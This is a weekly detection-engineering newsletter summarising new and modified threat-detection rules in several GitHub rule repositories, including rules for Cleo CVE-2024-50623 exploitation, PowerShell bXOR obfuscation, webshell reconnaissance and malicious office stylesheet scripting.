This edition highlights detection rule changes from 4 GitHub repositories (out of 40+ monitored) between Dec 9 and Dec 16, 2024.

In this period, 6 new rules were added, and 7 were updated. We focus only on medium, high, or critical impact changes to bring you the most relevant updates.

Stay informed on the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Key Points

Recent updates in detection rules have significantly enhanced threat coverage and detection capability. High-severity rule additions address emerging vulnerabilities, such as the CVE-2024-50623 exploitation attempts with Cleo, expanding protection against specific attack vectors. Medium impact changes include new detections for obfuscation techniques in PowerShell, underscoring efforts to counter evasive tactics used by attackers preemptively. These updates bolster security postures by adding detection breadth, though they may necessitate increased monitoring vigilance due to broader criteria triggering alerts.

• The addition of a rule detecting exploitation attempts for Cleo's CVE-2024-50623 vulnerability addresses an emerging threat, enhancing detection coverage against specific exploitation vectors originating from Cleo software. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)

• New rules introduced target bxor operator usage in PowerShell command lines, a potential obfuscation technique, which is crucial for identifying evasive threats and improving security within Windows environments. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)

• Update includes enhanced coverage for process termination methods on Linux, now detecting 'xkill' usage, improving identification of potentially harmful process terminations representing abnormal activities. (SigmaHQ/sigma)

• Modified webshell reconnaissance rules incorporate additional PowerShell command indicators and execution conditions to broaden detection of suspicious activities, helping protect against more varied and sophisticated webshell use. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)

• Enhancements to a rule increase detection coverage for malicious office document attachments utilizing XLS stylesheet scripting, aimed at reducing false negatives and identifying high-risk phishing or malware in emails. (delivr-to/detections)

• A new rule to detect Microsoft recommended driver block list enhances coverage against loading vulnerable drivers, aiding in defense against evasion via malicious drivers in Azure environments. (Cyb3r-Monk/Threat-Hunting-and-Detection)

Corporate repositories (3)

SigmaHQ/sigma (2 added, 2 modified)

Important updates include the addition of a new rule for CVE-2024-50623 exploitation detection, significantly enhancing threat coverage with high severity impact. Two rules have been modified regarding Linux suspicious activities and PowerShell obfuscation techniques, adjusting alert levels to medium, improving detection precision and breadth. A rule deletion for PowerShell XOR use indicates a strategic reshuffle for better consolidation, indicating a refocus in monitoring efforts.

➕ New rules

• CVE-2024-50623 Exploitation Attempt - Cleo
  Coverage change | High impact | Source
  New rule added to detect exploitation attempts of CVE-2024-50623 involving Cleo software. The rule monitors for 'cmd.exe' processes spawned via Cleo software with suspicious PowerShell command lines, like encoded or download commands.

• bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
  ThreatIntelligence change | Medium impact | Source
  Introduced a new rule to identify the use of the bXOR operator in PowerShell command lines, a potential obfuscation tactic used by attackers as an alternative to Base64 encoding.

✎ Modified rules

• Linux Suspicious Process Termination via Kill
  Coverage change | Medium impact | Source
  The rule now includes detection for usage of 'xkill', enhancing the range of suspicious process termination methods detected. Level changed from low to medium, reflecting the increased concern over legitimate yet potentially harmful tool misuse.

• Webshell Recon Commands and Processes
  CoverageIncrease change | Medium impact | Source
  Expanded detection to include additional suspicious CLI patterns involving PowerShell with hidden execution modifiers and specific command structures indicative of malicious behavior.

delivr-to/detections (1 added)

The newly added rule 'Attachment: Office Stylesheet Scripting' improves detection capabilities against potentially malicious documents employing XLST stylesheet scripting. It enhances the identification of threats embedded within office attachments by inspecting file extensions, specific script content, and sender profiles. This change enhances coverage against sophisticated malware distribution methods in email, marked with medium impact severity.

➕ New rules

• Attachment: Office Stylesheet Scripting
  Coverage change | Medium impact | Source
  This new rule detects potentially malicious office documents that utilize XLST stylesheet scripting. It examines attachments with specific file types and extensions, scanning for scripting indicators in the document's content. The rule leverages YARA flavors to identify VB script files and looks for specific scripting functions like 'transformNodeToObject' and 'LoadXML'. It also considers sender profiles, flagging emails from previously malicious domains.

Yamato-Security/hayabusa-rules (2 added, 2 modified)

Significant changes have been introduced with the addition of new rules targeting bXOR usage in PowerShell and CVE-2024-50623 exploitation, both classified as high-impact due to their enhancement of detection coverage against obfuscation techniques and specific exploits. Several detection rules were also modified to improve detection criteria, particularly enhancing PowerShell command obfuscation tracking, potentially increasing alert volume and analytic demands due to broader trigger conditions.

➕ New rules

• bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
  Coverage change | High impact | Source
  A new rule targeting the detection of bxor usage in PowerShell command lines, indicating potentially obfuscated commands typically used by adversaries for evasion.

• CVE-2024-50623 Exploitation Attempt - Cleo
  Coverage change | High impact | Source
  Introduces a new rule detecting exploitation attempts of Cleo's CVE-2024-50623 using suspicious command-line activities associated with cmd.exe and PowerShell commands originating from the Cleo software suite.

✎ Modified rules

• Process Creation Webshell Recon Commands and Processes
  Coverage change | Medium impact | Source
  Enhanced detection logic by adding new command line indicators for suspicious PowerShell command usage, and extended support to include additional executor files like 'pwsh.exe'. The modification includes tighter conditions matching encoded and obfuscated commands.

• Sysmon Process Creation Webshell Recon Commands and Processes
  Coverage change | Medium impact | Source
  Expanded detection criteria to account for PowerShell commands running with obfuscation and potentially suspicious intention, now including specific command-line patterns and file executions (e.g., 'cmd.exe', 'pwsh.exe').

Personal repositories (1)

Cyb3r-Monk/Threat-Hunting-and-Detection (1 added)

A new rule, 'Microsoft Recommended Driver Block List', was added, enhancing detection coverage for vulnerable drivers as part of defense evasion tactics. This addition is crucial for identifying malicious driver activities, thereby strengthening overall security posture against unauthorized access or malfeasance via compromised drivers.

➕ New rules

• Microsoft Recommended Driver Block List
  Coverage change | Medium impact | Source
  The rule has been added to detect the loading or creation of drivers listed in Microsoft's recommended driver block rules using Azure KQL. It integrates with the MDE/M365D platforms and parses data from DeviceEvents and DeviceFileEvents tables.

Feedback

Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include, we’d love to hear from you. Reach out to us at team@rulecheck.io. We value your feedback and are committed to making this resource better for the detection engineering community.

Powered by

This digest is brought to you in collaboration with BlackStork.io, combining their content generation tech with our detection engineering expertise to deliver timely, high-quality updates straight to your inbox.

Are you looking for a customized version of the newsletter or interested in licensing your own hosted instance? We’d be happy to help — reach out to us.